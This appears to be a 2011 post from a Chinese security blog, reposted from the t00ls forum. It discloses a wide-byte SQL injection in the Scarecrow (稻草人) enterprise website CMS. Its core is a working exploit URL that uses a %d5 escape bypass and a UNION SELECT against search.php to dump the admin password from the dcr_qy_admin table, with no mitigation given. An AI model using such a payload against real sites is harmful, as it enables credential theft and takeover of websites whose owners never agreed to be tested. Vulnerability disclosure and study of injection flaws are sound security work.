Skip to content

游侠安全网

关注网络与数据安全

  • 业界
  • 安全
  • 网络
  • 办公
  • 厂商
  • 培训
  • 应用
  • 影音
  • 数码
  • 文摘
  • 猎头
  • 程序
  • 站长
  • 系统
  • 随笔
 Posted in 站长

稻草人企业站管理系统宽字节注入

 2011年5月16日

  偶然在站长下载站下了一套企业建站程序
  发现人气还蛮高的

  下载地址
  http://down.chinaz.com/soft/26802.htm

  就去测试一下发现了一个宽字节注入漏洞

http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

  爆密码的效果如下

  转自:t00ls

相关内容:

  • 【鼎源资讯】苹果 iOS 9.1-9.3.4 完美越狱发布,支持 32 位设备
  • 瑞星紧急发布周一应对“WanaCrypt”蠕虫敲诈病毒的开机指南
  • 阿拉斯一地区遭黑客攻击后 已付清黑客索要的比特币
  • 关注于渗透测试及数字取证的发行版 Parrot 发布 3.11 版本
  • 韩国警方:三年来全国有7家加密货币交易所和158个钱包遭黑客攻击
  • 向日葵远程控制软件CNVD-2022-03672安全更新修复
Tagged 企业网站管理系统, 稻草人企业站管理系统

文章导航

风讯FoosunCMS浏览目录创建文件漏洞&xss+up上传鸡肋漏洞利用 →
← 网易与奇虎360就邮箱安全深度合作

Feed更新

  • 网络安全检查清单(2026版)|等保合规自查必备Checklist
  • 什么是 nDPI?开源深度包检测引擎 nDPI 全面解析
  • Windows日志采集工具:从NXLog到Winlogbeat,国产免费客户端只有WinLogAgent
  • 强迫症狂喜:WinLogAgent 1.0.3 升级:目录只有1个exe啦!
  • WinLogAgent 1.0.3 发布:可能是这个星球上“违反广告法般漂亮”的 Windows 日志采集客户端,永久免费!
  • GStack 拆解:YC CEO 的 23 个 AI 角色编程工作流
  • 16 个公开 CVE 撕开汽车安全盲区:开源小组件,也能变成大风险
  • 8 周零广告从 0 涨至 1.5 万活跃用户:Claude+AEO+SEO 完整获客套路
  • 快手 KroWork 做个桌面软件的四个实测,第三个最实用
  • Dirty Frag:通用 Linux 本地权限提升漏洞

网安大全

自2014年2月22日始,“游侠安全网”就在维护《中国网络安全产品和厂家大全》,您可以点击这里获取最新版。如果您可以分享给朋友,游侠表示感谢!

微信公众号

“游侠安全网”微信公众号游侠安全网微信公众号

  • 业界
  • 安全
  • 网络
  • 办公
  • 厂商
  • 培训
  • 应用
  • 影音
  • 数码
  • 文摘
  • 猎头
  • 程序
  • 站长
  • 系统
  • 随笔

Copyright © 2005-2026 游侠安全网 陕ICP备11003551号-2

Design by ThemesDNA.com